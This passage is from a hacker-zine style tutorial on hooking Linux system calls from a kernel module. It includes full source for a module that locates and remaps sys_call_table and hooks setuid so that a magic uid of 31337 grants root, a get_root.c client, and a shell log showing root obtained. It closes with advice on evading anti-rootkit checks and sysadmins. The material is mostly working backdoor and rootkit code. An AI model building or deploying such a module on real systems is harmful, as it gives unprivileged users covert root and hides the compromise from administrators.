To call vmap we have to include linux/vmalloc.h and linux/mm.h.
The 1st argument we pass consists of 2 pages because sys_call_table
may be split in 2 pieces, if part of it lies in the next page. The 3rd
argument is the flag VM_MAP, which tells vmap that we gave it an array
of pages to map. Finally, the 4th argument we pass is PAGE_KERNEL,
which makes the new mapping readable and writable.
vmap will return the address where the 1st page we asked for is mapped,
and to access sys_call_table we need to add its offset within the page.
We can get this offset with the offset_in_page() macro. Inside the
cleanup function we have to call vunmap() to unmap the pages.
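The page arithmetic can be tried in userland with the numbers from
section 0x05. This is a sketch that assumes 4096-byte pages; the TOY_
macros and functions are my own stand-ins for PAGE_SIZE, PAGE_MASK and
offset_in_page(), not the kernel definitions.

```c
#include <stddef.h>
#include <stdint.h>

/* Stand-ins for the kernel macros, assuming 4096-byte pages. */
#define TOY_PAGE_SHIFT 12
#define TOY_PAGE_SIZE  ((uintptr_t)1 << TOY_PAGE_SHIFT)
#define TOY_PAGE_MASK  (~(TOY_PAGE_SIZE - 1))

/* Address of the page that contains addr (bitwise AND with the mask). */
uintptr_t toy_page_base(uintptr_t addr) {
    return addr & TOY_PAGE_MASK;
}

/* Offset of addr inside its page (the low 12 bits). */
uintptr_t toy_offset_in_page(uintptr_t addr) {
    return addr & ~TOY_PAGE_MASK;
}

/* Number of pages touched by the byte range [addr, addr + len).
 * len must be greater than 0. */
size_t toy_pages_spanned(uintptr_t addr, size_t len) {
    uintptr_t first = toy_page_base(addr);
    uintptr_t last  = toy_page_base(addr + len - 1);

    return (size_t)((last - first) >> TOY_PAGE_SHIFT) + 1;
}
```

On the x86-32 box above the table is at 0xc1582160 and, judging from
the "cmp $0x152,%eax" in the gdb dump, has 0x152 entries of 4 bytes,
that is 1352 bytes. There it fits in one page, but a table that started
near the end of a page would spill into the next one, which is why 2
pages are mapped.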
--function: get_writable_sct()--
void *get_writable_sct(void *sct_addr) {
struct page *p[2];
void *sct;
unsigned long addr = (unsigned long)sct_addr & PAGE_MASK;
if (sct_addr == NULL)
return NULL;
#if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,22) && defined(__x86_64__)
p[0] = pfn_to_page(__pa_symbol(addr) >> PAGE_SHIFT);
p[1] = pfn_to_page(__pa_symbol(addr + PAGE_SIZE) >> PAGE_SHIFT);
#else
p[0] = virt_to_page(addr);
p[1] = virt_to_page(addr + PAGE_SIZE);
#endif
sct = vmap(p, 2, VM_MAP, PAGE_KERNEL);
if (sct == NULL)
return NULL;
return sct + offset_in_page(sct_addr);
}
-- END OF FUNCTION --
-- EXAMPLE --
void **sys_call_table = get_writable_sct(get_sys_call_table());
// hook some system calls
vunmap((void*)((unsigned long)sys_call_table & PAGE_MASK));
-- END OF EXAMPLE --
--[ 0x0A Hook a system call
To hook a system call, we first store its real address and then
replace it with the address of the function we created. The
declarations of the system call functions are found in
"include/linux/syscalls.h" [5]. As an example take a look at the
declaration of setuid:
asmlinkage long sys_setuid(uid_t uid);
asmlinkage is a macro which, on x86-32, tells gcc that the arguments
are passed on the stack and not in registers, whatever the
optimization settings. In our module, we will define the following:
asmlinkage long (*real_setuid)(uid_t uid);
real_setuid is a pointer to a function. After that we create our
function, which will call real_setuid().
asmlinkage long hooked_setuid(uid_t uid) {
return real_setuid(uid);
}
If we include asm/unistd_32.h we get the system call numbers for
x86-32, and if we include asm/unistd_64.h we get the numbers for
x86-64. With older kernel headers these files were asm-i386/unistd.h
and asm-x86_64/unistd.h. If we include asm/unistd.h, the preprocessor
will decide which one to use. In these files the system call numbers
have the __NR_ prefix. For example __NR_setuid gives us setuid's
number. To hook setuid we write the following:
real_setuid = sys_call_table[__NR_setuid];
sys_call_table[__NR_setuid] = hooked_setuid;
and to unhook it while cleaning up we do:
sys_call_table[__NR_setuid] = real_setuid;
When we want the module to work on both x86 architectures, we should
use the preprocessor. If CONFIG_IA32_EMULATION is defined, x86-32
system calls also work on the x86-64 system. The sys_call_table and
the ia32_sys_call_table share many of the same handlers, such as
sys_setuid, but at different indexes. There is a small problem:
asm/unistd_32.h and asm/unistd_64.h use the same names for their
values, so we can't include both at the same time. A simple solution
is a small script which detects whether the architecture is x86-64 and
copies asm/unistd_32.h (or asm-i386/unistd.h) into the folder of our
source code, replacing the prefix __NR_ with __NR32_.
--file: configure.sh--
#!/bin/sh
if [ `uname -m` = x86_64 ]; then
if [ -e /usr/include/asm/unistd_32.h ]; then
sed -e 's/__NR_/__NR32_/g' /usr/include/asm/unistd_32.h > unistd_32.h
else
if [ -e /usr/include/asm-i386/unistd.h ]; then
sed -e 's/__NR_/__NR32_/g' /usr/include/asm-i386/unistd.h > unistd_32.h
else
echo "asm/unistd_32.h and asm-i386/unistd.h do not exist."
fi
fi
fi
--EOF--
Here we should include this:
#ifdef CONFIG_IA32_EMULATION
#include "unistd_32.h"
#endif
with that we will actually hook it:
#ifdef CONFIG_IA32_EMULATION
ia32_sys_call_table[__NR32_setuid] = hooked_setuid;
#endif
and with that unhook it:
#ifdef CONFIG_IA32_EMULATION
ia32_sys_call_table[__NR32_setuid] = real_setuid;
#endif
Notice: Sometimes, when the implementation of a system call is changed
completely because the previous one was deprecated, the old number is
not reused; a new one is added instead. Indeed, after some kernel
version, setuid exists twice on x86-32, as sys_setuid16 and
sys_setuid. sys_setuid16 has the number __NR_setuid and sys_setuid the
number __NR_setuid32. In this case we can hook both if we want, using
the preprocessor to add the extra code. I am not going to implement
this, but I will show you the case where we only want to hook
sys_setuid.
hook:
#ifdef __NR_setuid32
real_setuid = sys_call_table[__NR_setuid32];
sys_call_table[__NR_setuid32] = hooked_setuid;
#else
real_setuid = sys_call_table[__NR_setuid];
sys_call_table[__NR_setuid] = hooked_setuid;
#endif
#ifdef CONFIG_IA32_EMULATION
#ifdef __NR32_setuid32
ia32_sys_call_table[__NR32_setuid32] = hooked_setuid;
#else
ia32_sys_call_table[__NR32_setuid] = hooked_setuid;
#endif
#endif
unhook:
#ifdef __NR_setuid32
sys_call_table[__NR_setuid32] = real_setuid;
#else
sys_call_table[__NR_setuid] = real_setuid;
#endif
#ifdef CONFIG_IA32_EMULATION
#ifdef __NR32_setuid32
ia32_sys_call_table[__NR32_setuid32] = real_setuid;
#else
ia32_sys_call_table[__NR32_setuid] = real_setuid;
#endif
#endif
Before I give you the source code of the whole module, let's make an
interesting modification to hooked_setuid. A nice idea is to set the
uid and gid of the process to 0 when setuid is called with a "magic"
number as its uid parameter. In other words, to give the process root
privileges.
Inside the kernel there are lots of data structures that may change in
future versions, if vulnerabilities are discovered or if they get
implemented in a better way. One of these is 'struct task_struct',
where a lot of information about a process can be found. This struct
contains 8 interesting variables:
uid_t uid, euid, suid, fsuid;
gid_t gid, egid, sgid, fsgid;
To refer to the running process we use the 'current' macro. For both
the struct and the macro we need to include linux/sched.h. To give
root privileges to a process we do the following:
current->uid = current->euid = current->suid = current->fsuid = 0;
current->gid = current->egid = current->sgid = current->fsgid = 0;
return 0;
This does not work on kernel 2.6.29 and above, because the data
structure, and in general the method that assigns a new uid and gid to
a process, has changed. In the new method there is a new struct,
'struct cred'. To change the uid and gid we first call
prepare_creds(), which returns a pointer to a newly created 'struct
cred' (or NULL if the allocation fails); then we change the variables
and call commit_creds(). Finally we return its result.
struct cred *cred = prepare_creds();
if (cred == NULL)
return -ENOMEM;
cred->uid = cred->suid = cred->euid = cred->fsuid = 0;
cred->gid = cred->sgid = cred->egid = cred->fsgid = 0;
return commit_creds(cred);
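The copy, modify, commit sequence can be modelled in userland. The
following is a toy model only: struct toy_cred and all toy_ functions
are invented for this sketch, and the real prepare_creds() and
commit_creds() do much more (reference counting, RCU, security hooks).

```c
#include <errno.h>
#include <stdlib.h>

/* Toy stand-in for the kernel's 'struct cred'; only the 8 ids. */
struct toy_cred {
    unsigned int uid, euid, suid, fsuid;
    unsigned int gid, egid, sgid, fsgid;
};

/* Credentials of the one and only "task" in this model. */
static struct toy_cred *toy_current_cred;

/* Like prepare_creds(): returns a private copy of the current
 * credentials, or NULL when out of memory. */
struct toy_cred *toy_prepare_creds(void) {
    struct toy_cred *new_cred = calloc(1, sizeof(*new_cred));

    if (new_cred != NULL && toy_current_cred != NULL)
        *new_cred = *toy_current_cred;
    return new_cred;
}

/* Like commit_creds(): install the copy and drop the old one. */
int toy_commit_creds(struct toy_cred *new_cred) {
    free(toy_current_cred);
    toy_current_cred = new_cred;
    return 0;
}

/* Set every uid to 'uid' and every gid to 'gid'. */
int toy_set_ids(unsigned int uid, unsigned int gid) {
    struct toy_cred *cred = toy_prepare_creds();

    if (cred == NULL)               /* never touch a failed copy */
        return -ENOMEM;
    cred->uid = cred->euid = cred->suid = cred->fsuid = uid;
    cred->gid = cred->egid = cred->sgid = cred->fsgid = gid;
    return toy_commit_creds(cred);
}

/* What hooked_setuid() does for the magic uid. */
int toy_give_root(void) {
    return toy_set_ids(0, 0);
}

/* Effective uid of the toy task, or (unsigned int)-1 before any
 * credentials were committed. */
unsigned int toy_current_euid(void) {
    return toy_current_cred ? toy_current_cred->euid : (unsigned int)-1;
}
```

The point of the pattern is that the live credentials are never edited
in place: all changes go to the copy, and the copy replaces the old
struct in a single step.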
I strongly advise you to use the kernel's git to understand the kernel
changes.
( http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=tags )
--file: hook_setuid.c--
#include <linux/module.h>
#include <linux/version.h>
#include <linux/vmalloc.h>
#include <linux/mm.h>
#include <linux/sched.h>
#include <asm/unistd.h>
#ifdef CONFIG_IA32_EMULATION
#include "unistd_32.h"
#endif
#ifdef __i386__
struct idt_descriptor {
unsigned short offset_low;
unsigned short selector;
unsigned char zero;
unsigned char type_flags;
unsigned short offset_high;
} __attribute__ ((packed));
#elif defined(CONFIG_IA32_EMULATION)
struct idt_descriptor {
unsigned short offset_low;
unsigned short selector;
unsigned char zero1;
unsigned char type_flags;
unsigned short offset_middle;
unsigned int offset_high;
unsigned int zero2;
} __attribute__ ((packed));
#endif
struct idtr {
unsigned short limit;
void *base;
} __attribute__ ((packed));
void **sys_call_table;
#ifdef CONFIG_IA32_EMULATION
void **ia32_sys_call_table;
#endif
asmlinkage long (*real_setuid)(uid_t uid);
asmlinkage long hooked_setuid(uid_t uid) {
if (uid == 31337) {
#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,29)
struct cred *cred = prepare_creds();
if (cred == NULL)
return -ENOMEM;
cred->uid = cred->suid = cred->euid = cred->fsuid = 0;
cred->gid = cred->sgid = cred->egid = cred->fsgid = 0;
return commit_creds(cred);
#else
current->uid = current->euid = current->suid = current->fsuid = 0;
current->gid = current->egid = current->sgid = current->fsgid = 0;
return 0;
#endif
}
return real_setuid(uid);
}
#if defined(__i386__) || defined(CONFIG_IA32_EMULATION)
#ifdef __i386__
void *get_sys_call_table(void) {
#elif defined(__x86_64__)
void *get_ia32_sys_call_table(void) {
#endif
struct idtr idtr;
struct idt_descriptor idtd;
void *system_call;
unsigned char *ptr;
int i;
asm volatile("sidt %0" : "=m"(idtr));
memcpy(&idtd, idtr.base + 0x80*sizeof(idtd), sizeof(idtd));
#ifdef __i386__
system_call = (void*)(((unsigned long)idtd.offset_high<<16) |
idtd.offset_low);
#elif defined(__x86_64__)
system_call = (void*)(((unsigned long)idtd.offset_high<<32) |
((unsigned long)idtd.offset_middle<<16) | idtd.offset_low);
#endif
for (ptr=system_call, i=0; i<500; i++) {
#ifdef __i386__
if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0x85)
return *((void**)(ptr+3));
#elif defined(__x86_64__)
if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0xc5)
return (void*) (0xffffffff00000000 | *((unsigned int*)(ptr+3)));
#endif
ptr++;
}
return NULL;
}
#endif

#ifdef __x86_64__
#define IA32_LSTAR 0xc0000082

/*
 * IA32_LSTAR holds the address of the "syscall" entry point. rdmsr
 * returns it in edx:eax, so both halves are kept unsigned to avoid sign
 * extension when they are combined.
 */
void *get_sys_call_table(void) {
    void *system_call;
    unsigned char *ptr;
    unsigned int low, high;
    int i;

    asm volatile("rdmsr" : "=a" (low), "=d" (high) : "c" (IA32_LSTAR));
    system_call = (void*)(((unsigned long)high<<32) | low);
    for (ptr=system_call, i=0; i<500; i++) {
        if (ptr[0] == 0xff && ptr[1] == 0x14 && ptr[2] == 0xc5)
            return (void*)(0xffffffff00000000 |
                           *((unsigned int*)(ptr+3)));
        ptr++;
    }
    return NULL;
}
#endif

/*
 * Map the pages that hold the table a second time with vmap() and return
 * the address of the table inside this writable mapping. Two pages are
 * mapped, so a table that crosses a page boundary is still covered.
 */
void *get_writable_sct(void *sct_addr) {
    struct page *p[2];
    void *sct;
    unsigned long addr = (unsigned long)sct_addr & PAGE_MASK;

    if (sct_addr == NULL)
        return NULL;

#if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,22) && defined(__x86_64__)
    p[0] = pfn_to_page(__pa_symbol(addr) >> PAGE_SHIFT);
    p[1] = pfn_to_page(__pa_symbol(addr + PAGE_SIZE) >> PAGE_SHIFT);
#else
    p[0] = virt_to_page(addr);
    p[1] = virt_to_page(addr + PAGE_SIZE);
#endif
    sct = vmap(p, 2, VM_MAP, PAGE_KERNEL);
    if (sct == NULL)
        return NULL;
    return sct + offset_in_page(sct_addr);
}

static int __init hook_init(void) {
    sys_call_table = get_writable_sct(get_sys_call_table());
    if (sys_call_table == NULL)
        return -1;

#ifdef CONFIG_IA32_EMULATION
    ia32_sys_call_table = get_writable_sct(get_ia32_sys_call_table());
    if (ia32_sys_call_table == NULL) {
        vunmap((void*)((unsigned long)sys_call_table & PAGE_MASK));
        return -1;
    }
#endif

    /* hook setuid */
#ifdef __NR_setuid32
    real_setuid = sys_call_table[__NR_setuid32];
    sys_call_table[__NR_setuid32] = hooked_setuid;
#else
    real_setuid = sys_call_table[__NR_setuid];
    sys_call_table[__NR_setuid] = hooked_setuid;
#endif
#ifdef CONFIG_IA32_EMULATION
#ifdef __NR32_setuid32
    ia32_sys_call_table[__NR32_setuid32] = hooked_setuid;
#else
    ia32_sys_call_table[__NR32_setuid] = hooked_setuid;
#endif
#endif
    /***************/

    return 0;
}

static void __exit hook_exit(void) {
    /* unhook setuid */
#ifdef __NR_setuid32
    sys_call_table[__NR_setuid32] = real_setuid;
#else
    sys_call_table[__NR_setuid] = real_setuid;
#endif
#ifdef CONFIG_IA32_EMULATION
#ifdef __NR32_setuid32
    ia32_sys_call_table[__NR32_setuid32] = real_setuid;
#else
    ia32_sys_call_table[__NR32_setuid] = real_setuid;
#endif
#endif
    /*****************/

    /* unmap memory */
    vunmap((void*)((unsigned long)sys_call_table & PAGE_MASK));
#ifdef CONFIG_IA32_EMULATION
    vunmap((void*)((unsigned long)ia32_sys_call_table & PAGE_MASK));
#endif
}

module_init(hook_init);
module_exit(hook_exit);
MODULE_LICENSE("GPL");
--EOF--
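The opcode search that get_sys_call_table() does on x86-64 can be tried
out in userland, without touching the kernel. The following is only a
sketch: find_call_table() is a hypothetical helper that is not part of
the module, and the buffer it scans is supplied by the caller instead of
being read from the real system_call. It looks for the bytes ff 14 c5
followed by a 32-bit displacement and sign-extends the displacement,
which for kernel addresses gives the same result as the OR with
0xffffffff00000000 used in the module.

```c
#include <stddef.h>
#include <stdint.h>

/*
 * Userland illustration only (hypothetical helper, not part of the
 * module): find "call *disp32(,%rax,8)", encoded as ff 14 c5 <disp32>,
 * in a byte buffer. Returns the sign-extended displacement, or 0 if the
 * pattern does not appear.
 */
uint64_t find_call_table(const unsigned char *code, size_t len)
{
    size_t i;

    /* the whole instruction is 7 bytes: 3 opcode bytes + 4 of disp32 */
    for (i = 0; i + 7 <= len; i++) {
        if (code[i] == 0xff && code[i + 1] == 0x14 && code[i + 2] == 0xc5) {
            /* disp32 is stored little-endian right after the opcode */
            uint32_t disp = (uint32_t)code[i + 3] |
                            ((uint32_t)code[i + 4] << 8) |
                            ((uint32_t)code[i + 5] << 16) |
                            ((uint32_t)code[i + 6] << 24);

            /* the CPU sign-extends disp32 to 64 bits */
            return (uint64_t)(int64_t)(int32_t)disp;
        }
    }
    return 0;
}
```

Feeding it a buffer that contains ff 14 c5 40 11 60 81 gives
0xffffffff81601140, an address made up for this example.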
--file: get_root.c--
#include <stdio.h>
#include <unistd.h>

int main() {
    if (setuid(31337) == -1) {
        perror("setuid");
        return 1;
    }
    execlp("bash", "bash", (char *)NULL);
    /* execlp returns only if it failed */
    perror("execlp");
    return 1;
}
--EOF--
oblique@gentoo ~/hooking $ ./configure.sh
oblique@gentoo ~/hooking $ make
make -C /lib/modules/2.6.34-zen1/build M=/home/oblique/hooking modules
make[1]: Entering directory `/usr/src/linux-2.6.34-zen1-r2'
CC [M] /home/oblique/hooking/hook_setuid.o
Building modules, stage 2.
MODPOST 1 modules
CC /home/oblique/hooking/hook_setuid.mod.o
LD [M] /home/oblique/hooking/hook_setuid.ko
make[1]: Leaving directory `/usr/src/linux-2.6.34-zen1-r2'
oblique@gentoo ~/hooking $ sudo insmod hook_setuid.ko
oblique@gentoo ~/hooking $ gcc get_root.c -o get_root
oblique@gentoo ~/hooking $ ./get_root
gentoo hooking # id
uid=0(root) gid=0(root) groups=0(root)
gentoo hooking # rmmod hook_setuid
gentoo hooking # exit
exit
oblique@gentoo ~/hooking $ ./get_root
setuid: Operation not permitted
oblique@gentoo ~/hooking $
--[ 0x0B Other ideas/methods
What we saw was one of the most basic hooking techniques. There are
lots of equivalent techniques. For example, to avoid editing the
sys_call_table itself, we can allocate a buffer in kernel memory and
copy the sys_call_table there. Then we change the addresses in the new
array and finally we change the table address used by the call inside
system_call. If we want, we can instead change the entry of interrupt
0x80 in the IDT, or the value of the IA32_LSTAR MSR, so that it points
to another system_call. Another elegant hooking method, independent of
system calls, is hooking the debugger's trap. This can be implemented
through the entry of interrupt 3 in the IDT.
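The first idea above (copy the table, patch the copy, redirect the
dispatcher) can be sketched in userland. Everything in this sketch is a
stand-in made up for the illustration: real_table plays the role of the
sys_call_table, dispatch() the role of the call inside system_call, and
active_table the role of the table address encoded in that call. It is
not kernel code and it says nothing about how the address is patched in
a real kernel.

```c
#include <stddef.h>
#include <string.h>

#define NR_CALLS 4                  /* hypothetical table size */

typedef long (*call_fn)(long);

static long orig_double(long x) { return 2 * x; }
static long orig_negate(long x) { return -x; }
static long orig_ident(long x)  { return x; }
static long orig_zero(long x)   { (void)x; return 0; }

/* stand-in for the sys_call_table, never modified */
static call_fn real_table[NR_CALLS] = {
    orig_double, orig_negate, orig_ident, orig_zero
};

/* private copy that receives the hooks */
static call_fn shadow_table[NR_CALLS];

/* stand-in for the table address used inside system_call */
static call_fn *active_table = real_table;

/* hook for entry 1: special-case a "magic" argument */
static long hooked_negate(long x)
{
    return x == 31337 ? 0 : orig_negate(x);
}

/* stand-in for "call *sys_call_table(,%eax,4)" */
long dispatch(size_t nr, long arg)
{
    return nr < NR_CALLS ? active_table[nr](arg) : -1;
}

/* copy the table, hook the copy, then switch the dispatcher to it */
void install_shadow(void)
{
    memcpy(shadow_table, real_table, sizeof(real_table));
    shadow_table[1] = hooked_negate;
    active_table = shadow_table;
}

/* switch the dispatcher back to the original table */
void remove_shadow(void)
{
    active_table = real_table;
}

/* nonzero while the original table still holds the original entry */
int real_table_untouched(void)
{
    return real_table[1] == orig_negate;
}
```

After install_shadow(), dispatch(1, 31337) goes through hooked_negate,
while a check that only reads real_table still finds the original
pointers.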
This technique has some limitations. It cannot be applied on systems
which have LKM support disabled. Modules *must* be compiled for the
same kernel they are going to be loaded into, which means that after a
kernel update the module needs to be recompiled. Solutions for these
issues are provided by some userland-based techniques which change the
kernel memory through /dev/mem or /dev/kmem, but in this case other
forms of protection have to be dealt with.
Notice: Anti-rootkits usually check the sys_call_table, so the method
shown here should not be used as it is. A possible workaround is to
change the sys_call_table address inside system_call, or to implement
our own system_call. Moreover, with lsmod or through /proc/kallsyms, a
sysadmin should be able to notice that something is wrong... but
hooking the system calls that these tools rely on can solve these
issues too.
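To see why a modified sys_call_table is easy to spot, here is a minimal
userland sketch of one check an anti-rootkit could plausibly do. The
function name and the idea of comparing against a single address range
are assumptions made for the illustration. Real tools may use other
checks, for example comparing against a saved copy of the table.

```c
#include <stddef.h>
#include <stdint.h>

/*
 * Hypothetical check: every entry of the table is expected to point
 * inside [text_start, text_end), the range of the kernel's own code.
 * Returns the index of the first entry outside that range, or -1 if all
 * entries are inside it.
 */
long first_suspicious_entry(const uintptr_t *table, size_t n,
                            uintptr_t text_start, uintptr_t text_end)
{
    size_t i;

    for (i = 0; i < n; i++) {
        if (table[i] < text_start || table[i] >= text_end)
            return (long)i;
    }
    return -1;
}
```

A hook that lives in module memory falls outside the kernel text range,
so its entry is reported. A check like this reads the original table
only, which is why redirecting system_call to a private copy would get
past it.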
I hope you enjoyed reading the article as much as I enjoyed writing it :)
Happy hacking,
oblique.
--[ 0x0C Greets
Greets to grhack.net community, AthCon staff and p0wnbox.Team. Special
thanks to slasher, huku, sin, Hack_ThE_PaRaDiSe, krumel, smack for
their knowledge and their company. Thanks pytt, angel_scar and
killer_null for being good friends. Last but not least I want to give
kudos to my friends from the real world, psychedelic music and FF.C for
their songs and philosophy.
--[ 0x0D References
[1] http://phrack.org/issues.html?issue=59&id=4#article
[2] http://phrack.org/issues.html?issue=58&id=7#article
[3] http://wiki.osdev.org/IDT#IDT_in_IA-32e_Mode_.2864-bit_IDT.29
[5] Linux Kernel source code ( http://kernel.org )
[6] KSplice source code ( http://www.ksplice.com/software )
Intel 64 and IA-32 Architectures Software Developer's Manual
( http://www.intel.com/products/processor/manuals/ ):
[7] "Volume 3A: System Programming Guide", Sections: 5.8.7 - 5.9, 9.4
[8] "Volume 3B: System Programming Guide", Appendix B
[9] "Volume 2B: Instruction Set Reference, N-Z", Section: 4.2,
Instructions: RDMSR, WRMSR, SYSCALL
# vim:tw=75:sts=4:sw=4:et